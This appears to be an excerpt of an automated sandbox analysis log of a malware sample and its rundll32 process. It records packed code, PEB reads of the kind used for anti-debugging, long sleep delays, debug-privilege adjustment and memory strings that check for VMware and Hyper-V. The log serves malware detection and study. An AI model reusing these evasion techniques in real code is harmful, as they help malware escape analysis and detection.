        Source: C:\Users\user\Desktop\zeuhAxTIRX.exeCode function: 0_2_00E5EEFB pushad ; ret 0_2_00E5EEFE
        Source: C:\Users\user\Desktop\zeuhAxTIRX.exeCode function: 0_2_00E517D0 push cs; retf C56Ch0_2_00E518FB
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0445D0D1 push ecx; ret 8_2_0445D0E4
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02A5425D push edi; retf 8_2_02A5426C
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02A5D128 pushad ; ret 8_2_02A5D12B
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02A69F27 push ebp; ret 8_2_02A69F28
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02A6E5CA push esp; ret 8_2_02A6E5CB
        Source: initial sampleStatic PE information: section name: .text entropy: 7.997908848134215
        Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\rundll32.exe TID: 5532 Thread sleep count: 31 > 30
        Source: C:\Windows\SysWOW64\rundll32.exe TID: 5532 Thread sleep time: -62000s >= -30000s
        Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04446DE6 rdtsc 8_2_04446DE6
        Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 866
        Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 852
        Source: C:\Users\user\Desktop\zeuhAxTIRX.exe Process information queried: ProcessInformation
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02A63200 FindFirstFileW,FindNextFileW,FindClose,8_2_02A63200
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02A631FA FindFirstFileW,FindNextFileW,FindClose,8_2_02A631FA
        Source: explorer.exe, 00000003.00000000.540271211.000000000834F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&0000006
        Source: explorer.exe, 00000003.00000000.540271211.000000000830B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
        Source: explorer.exe, 00000003.00000000.533208076.00000000059F0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b
        Source: explorer.exe, 00000003.00000000.540271211.0000000008394000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
        Source: explorer.exe, 00000003.00000003.675302292.00000000084CC000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW.wg(
        Source: explorer.exe, 00000003.00000000.542257997.000000000CDEC000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: _VMware_SATA_CD00#5&
        Source: explorer.exe, 00000003.00000003.562894525.0000000008577000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: explorer.exe, 00000003.00000000.540271211.000000000830B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000000
        Source: explorer.exe, 00000003.00000003.672855160.000000000D001000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.672404068.000000000CFD9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: C:\Users\user\Desktop\zeuhAxTIRX.exe Process token adjusted: Debug
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0443A44B mov eax, dword ptr fs:[00000030h]8_2_0443A44B
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0449C450 mov eax, dword ptr fs:[00000030h]8_2_0449C450
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0442746D mov eax, dword ptr fs:[00000030h]8_2_0442746D
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044D740D mov eax, dword ptr fs:[00000030h]8_2_044D740D
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04486C0A mov eax, dword ptr fs:[00000030h]8_2_04486C0A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044C1C06 mov eax, dword ptr fs:[00000030h]8_2_044C1C06
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0443BC2C mov eax, dword ptr fs:[00000030h]8_2_0443BC2C
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044D8CD6 mov eax, dword ptr fs:[00000030h]8_2_044D8CD6
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044C14FB mov eax, dword ptr fs:[00000030h]8_2_044C14FB
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04486CF0 mov eax, dword ptr fs:[00000030h]8_2_04486CF0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04486CF0 mov eax, dword ptr fs:[00000030h]8_2_04486CF0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04486CF0 mov eax, dword ptr fs:[00000030h]8_2_04486CF0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0441849B mov eax, dword ptr fs:[00000030h]8_2_0441849B
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04443D43 mov eax, dword ptr fs:[00000030h]8_2_04443D43
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04483540 mov eax, dword ptr fs:[00000030h]8_2_04483540
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04427D50 mov eax, dword ptr fs:[00000030h]8_2_04427D50
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0442C577 mov eax, dword ptr fs:[00000030h]8_2_0442C577
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0442C577 mov eax, dword ptr fs:[00000030h]8_2_0442C577
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0440AD30 mov eax, dword ptr fs:[00000030h]8_2_0440AD30
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04413D34 mov eax, dword ptr fs:[00000030h]8_2_04413D34
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04413D34 mov eax, dword ptr fs:[00000030h]8_2_04413D34
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04413D34 mov eax, dword ptr fs:[00000030h]8_2_04413D34
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04413D34 mov eax, dword ptr fs:[00000030h]8_2_04413D34
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04413D34 mov eax, dword ptr fs:[00000030h]8_2_04413D34
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04413D34 mov eax, dword ptr fs:[00000030h]8_2_04413D34
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04413D34 mov eax, dword ptr fs:[00000030h]8_2_04413D34
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04413D34 mov eax, dword ptr fs:[00000030h]8_2_04413D34
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04413D34 mov eax, dword ptr fs:[00000030h]8_2_04413D34
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04413D34 mov eax, dword ptr fs:[00000030h]8_2_04413D34
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04413D34 mov eax, dword ptr fs:[00000030h]8_2_04413D34
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04413D34 mov eax, dword ptr fs:[00000030h]8_2_04413D34
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04413D34 mov eax, dword ptr fs:[00000030h]8_2_04413D34
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044CE539 mov eax, dword ptr fs:[00000030h]8_2_044CE539
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04434D3B mov eax, dword ptr fs:[00000030h]8_2_04434D3B
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04434D3B mov eax, dword ptr fs:[00000030h]8_2_04434D3B
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04434D3B mov eax, dword ptr fs:[00000030h]8_2_04434D3B
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044D8D34 mov eax, dword ptr fs:[00000030h]8_2_044D8D34
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0448A537 mov eax, dword ptr fs:[00000030h]8_2_0448A537
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04486DC9 mov eax, dword ptr fs:[00000030h]8_2_04486DC9
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04486DC9 mov eax, dword ptr fs:[00000030h]8_2_04486DC9
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04486DC9 mov eax, dword ptr fs:[00000030h]8_2_04486DC9
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04486DC9 mov ecx, dword ptr fs:[00000030h]8_2_04486DC9
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04486DC9 mov eax, dword ptr fs:[00000030h]8_2_04486DC9
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04486DC9 mov eax, dword ptr fs:[00000030h]8_2_04486DC9
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0441D5E0 mov eax, dword ptr fs:[00000030h]8_2_0441D5E0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0441D5E0 mov eax, dword ptr fs:[00000030h]8_2_0441D5E0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044CFDE2 mov eax, dword ptr fs:[00000030h]8_2_044CFDE2
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044CFDE2 mov eax, dword ptr fs:[00000030h]8_2_044CFDE2
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044CFDE2 mov eax, dword ptr fs:[00000030h]8_2_044CFDE2
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044CFDE2 mov eax, dword ptr fs:[00000030h]8_2_044CFDE2
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044B8DF1 mov eax, dword ptr fs:[00000030h]8_2_044B8DF1
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04432581 mov eax, dword ptr fs:[00000030h]8_2_04432581
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04432581 mov eax, dword ptr fs:[00000030h]8_2_04432581
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04432581 mov eax, dword ptr fs:[00000030h]8_2_04432581
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04432581 mov eax, dword ptr fs:[00000030h]8_2_04432581
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04402D8A mov eax, dword ptr fs:[00000030h]8_2_04402D8A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04402D8A mov eax, dword ptr fs:[00000030h]8_2_04402D8A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04402D8A mov eax, dword ptr fs:[00000030h]8_2_04402D8A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04402D8A mov eax, dword ptr fs:[00000030h]8_2_04402D8A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04402D8A mov eax, dword ptr fs:[00000030h]8_2_04402D8A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0443FD9B mov eax, dword ptr fs:[00000030h]8_2_0443FD9B
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0443FD9B mov eax, dword ptr fs:[00000030h]8_2_0443FD9B
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044D05AC mov eax, dword ptr fs:[00000030h]8_2_044D05AC
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044D05AC mov eax, dword ptr fs:[00000030h]8_2_044D05AC
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044335A1 mov eax, dword ptr fs:[00000030h]8_2_044335A1
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04431DB5 mov eax, dword ptr fs:[00000030h]8_2_04431DB5
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04431DB5 mov eax, dword ptr fs:[00000030h]8_2_04431DB5
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04431DB5 mov eax, dword ptr fs:[00000030h]8_2_04431DB5
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04417E41 mov eax, dword ptr fs:[00000030h]8_2_04417E41
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04417E41 mov eax, dword ptr fs:[00000030h]8_2_04417E41
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04417E41 mov eax, dword ptr fs:[00000030h]8_2_04417E41
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04417E41 mov eax, dword ptr fs:[00000030h]8_2_04417E41
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04417E41 mov eax, dword ptr fs:[00000030h]8_2_04417E41
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04417E41 mov eax, dword ptr fs:[00000030h]8_2_04417E41
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044CAE44 mov eax, dword ptr fs:[00000030h]8_2_044CAE44
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044CAE44 mov eax, dword ptr fs:[00000030h]8_2_044CAE44
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0441766D mov eax, dword ptr fs:[00000030h]8_2_0441766D
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0442AE73 mov eax, dword ptr fs:[00000030h]8_2_0442AE73
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0442AE73 mov eax, dword ptr fs:[00000030h]8_2_0442AE73
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0442AE73 mov eax, dword ptr fs:[00000030h]8_2_0442AE73
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0442AE73 mov eax, dword ptr fs:[00000030h]8_2_0442AE73
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0442AE73 mov eax, dword ptr fs:[00000030h]8_2_0442AE73
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0440C600 mov eax, dword ptr fs:[00000030h]8_2_0440C600
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0440C600 mov eax, dword ptr fs:[00000030h]8_2_0440C600
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0440C600 mov eax, dword ptr fs:[00000030h]8_2_0440C600
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04438E00 mov eax, dword ptr fs:[00000030h]8_2_04438E00
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044C1608 mov eax, dword ptr fs:[00000030h]8_2_044C1608
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0443A61C mov eax, dword ptr fs:[00000030h]8_2_0443A61C
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0443A61C mov eax, dword ptr fs:[00000030h]8_2_0443A61C
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0440E620 mov eax, dword ptr fs:[00000030h]8_2_0440E620
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044BFE3F mov eax, dword ptr fs:[00000030h]8_2_044BFE3F
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04448EC7 mov eax, dword ptr fs:[00000030h]8_2_04448EC7
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044BFEC0 mov eax, dword ptr fs:[00000030h]8_2_044BFEC0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044336CC mov eax, dword ptr fs:[00000030h]8_2_044336CC
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044D8ED6 mov eax, dword ptr fs:[00000030h]8_2_044D8ED6
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044316E0 mov ecx, dword ptr fs:[00000030h]8_2_044316E0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044176E2 mov eax, dword ptr fs:[00000030h]8_2_044176E2
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0449FE87 mov eax, dword ptr fs:[00000030h]8_2_0449FE87
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044D0EA5 mov eax, dword ptr fs:[00000030h]8_2_044D0EA5
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044D0EA5 mov eax, dword ptr fs:[00000030h]8_2_044D0EA5
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044D0EA5 mov eax, dword ptr fs:[00000030h]8_2_044D0EA5
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044846A7 mov eax, dword ptr fs:[00000030h]8_2_044846A7
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0441EF40 mov eax, dword ptr fs:[00000030h]8_2_0441EF40
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0441FF60 mov eax, dword ptr fs:[00000030h]8_2_0441FF60
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044D8F6A mov eax, dword ptr fs:[00000030h]8_2_044D8F6A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044D070D mov eax, dword ptr fs:[00000030h]8_2_044D070D
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044D070D mov eax, dword ptr fs:[00000030h]8_2_044D070D
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0443A70E mov eax, dword ptr fs:[00000030h]8_2_0443A70E
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0443A70E mov eax, dword ptr fs:[00000030h]8_2_0443A70E
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0442F716 mov eax, dword ptr fs:[00000030h]8_2_0442F716
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0449FF10 mov eax, dword ptr fs:[00000030h]8_2_0449FF10
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0449FF10 mov eax, dword ptr fs:[00000030h]8_2_0449FF10
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04404F2E mov eax, dword ptr fs:[00000030h]8_2_04404F2E
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04404F2E mov eax, dword ptr fs:[00000030h]8_2_04404F2E
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0443E730 mov eax, dword ptr fs:[00000030h]8_2_0443E730
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044437F5 mov eax, dword ptr fs:[00000030h]8_2_044437F5
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04418794 mov eax, dword ptr fs:[00000030h]8_2_04418794
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04487794 mov eax, dword ptr fs:[00000030h]8_2_04487794
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04487794 mov eax, dword ptr fs:[00000030h]8_2_04487794
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04487794 mov eax, dword ptr fs:[00000030h]8_2_04487794
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04420050 mov eax, dword ptr fs:[00000030h]8_2_04420050
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04420050 mov eax, dword ptr fs:[00000030h]8_2_04420050
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044D1074 mov eax, dword ptr fs:[00000030h]8_2_044D1074
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044C2073 mov eax, dword ptr fs:[00000030h]8_2_044C2073
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044D4015 mov eax, dword ptr fs:[00000030h]8_2_044D4015
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044D4015 mov eax, dword ptr fs:[00000030h]8_2_044D4015
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04487016 mov eax, dword ptr fs:[00000030h]8_2_04487016
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04487016 mov eax, dword ptr fs:[00000030h]8_2_04487016
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04487016 mov eax, dword ptr fs:[00000030h]8_2_04487016
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0441B02A mov eax, dword ptr fs:[00000030h]8_2_0441B02A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0441B02A mov eax, dword ptr fs:[00000030h]8_2_0441B02A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0441B02A mov eax, dword ptr fs:[00000030h]8_2_0441B02A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0441B02A mov eax, dword ptr fs:[00000030h]8_2_0441B02A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0443002D mov eax, dword ptr fs:[00000030h]8_2_0443002D
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0443002D mov eax, dword ptr fs:[00000030h]8_2_0443002D
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0443002D mov eax, dword ptr fs:[00000030h]8_2_0443002D
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0443002D mov eax, dword ptr fs:[00000030h]8_2_0443002D
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0443002D mov eax, dword ptr fs:[00000030h]8_2_0443002D
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0449B8D0 mov eax, dword ptr fs:[00000030h]8_2_0449B8D0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0449B8D0 mov ecx, dword ptr fs:[00000030h]8_2_0449B8D0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0449B8D0 mov eax, dword ptr fs:[00000030h]8_2_0449B8D0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0449B8D0 mov eax, dword ptr fs:[00000030h]8_2_0449B8D0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0449B8D0 mov eax, dword ptr fs:[00000030h]8_2_0449B8D0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0449B8D0 mov eax, dword ptr fs:[00000030h]8_2_0449B8D0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044040E1 mov eax, dword ptr fs:[00000030h]8_2_044040E1
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044040E1 mov eax, dword ptr fs:[00000030h]8_2_044040E1
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044040E1 mov eax, dword ptr fs:[00000030h]8_2_044040E1
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044058EC mov eax, dword ptr fs:[00000030h]8_2_044058EC
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04409080 mov eax, dword ptr fs:[00000030h]8_2_04409080
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04483884 mov eax, dword ptr fs:[00000030h]8_2_04483884
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04483884 mov eax, dword ptr fs:[00000030h]8_2_04483884
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044320A0 mov eax, dword ptr fs:[00000030h]8_2_044320A0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044320A0 mov eax, dword ptr fs:[00000030h]8_2_044320A0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044320A0 mov eax, dword ptr fs:[00000030h]8_2_044320A0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044320A0 mov eax, dword ptr fs:[00000030h]8_2_044320A0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044320A0 mov eax, dword ptr fs:[00000030h]8_2_044320A0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044320A0 mov eax, dword ptr fs:[00000030h]8_2_044320A0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044490AF mov eax, dword ptr fs:[00000030h]8_2_044490AF
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0443F0BF mov ecx, dword ptr fs:[00000030h]8_2_0443F0BF
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0443F0BF mov eax, dword ptr fs:[00000030h]8_2_0443F0BF
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0443F0BF mov eax, dword ptr fs:[00000030h]8_2_0443F0BF
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0442B944 mov eax, dword ptr fs:[00000030h]8_2_0442B944
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0442B944 mov eax, dword ptr fs:[00000030h]8_2_0442B944
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0440C962 mov eax, dword ptr fs:[00000030h]8_2_0440C962
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0440B171 mov eax, dword ptr fs:[00000030h]8_2_0440B171
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0440B171 mov eax, dword ptr fs:[00000030h]8_2_0440B171
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04409100 mov eax, dword ptr fs:[00000030h]8_2_04409100
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04409100 mov eax, dword ptr fs:[00000030h]8_2_04409100
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04409100 mov eax, dword ptr fs:[00000030h]8_2_04409100
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04424120 mov eax, dword ptr fs:[00000030h]8_2_04424120
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04424120 mov eax, dword ptr fs:[00000030h]8_2_04424120
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04424120 mov eax, dword ptr fs:[00000030h]8_2_04424120
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04424120 mov eax, dword ptr fs:[00000030h]8_2_04424120
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04424120 mov ecx, dword ptr fs:[00000030h]8_2_04424120
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0443513A mov eax, dword ptr fs:[00000030h]8_2_0443513A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0443513A mov eax, dword ptr fs:[00000030h]8_2_0443513A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044941E8 mov eax, dword ptr fs:[00000030h]8_2_044941E8
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0440B1E1 mov eax, dword ptr fs:[00000030h]8_2_0440B1E1
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0440B1E1 mov eax, dword ptr fs:[00000030h]8_2_0440B1E1
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0440B1E1 mov eax, dword ptr fs:[00000030h]8_2_0440B1E1
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0442C182 mov eax, dword ptr fs:[00000030h]8_2_0442C182
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0443A185 mov eax, dword ptr fs:[00000030h]8_2_0443A185
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04432990 mov eax, dword ptr fs:[00000030h]8_2_04432990
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044361A0 mov eax, dword ptr fs:[00000030h]8_2_044361A0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044361A0 mov eax, dword ptr fs:[00000030h]8_2_044361A0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044869A6 mov eax, dword ptr fs:[00000030h]8_2_044869A6
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044851BE mov eax, dword ptr fs:[00000030h]8_2_044851BE
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044851BE mov eax, dword ptr fs:[00000030h]8_2_044851BE
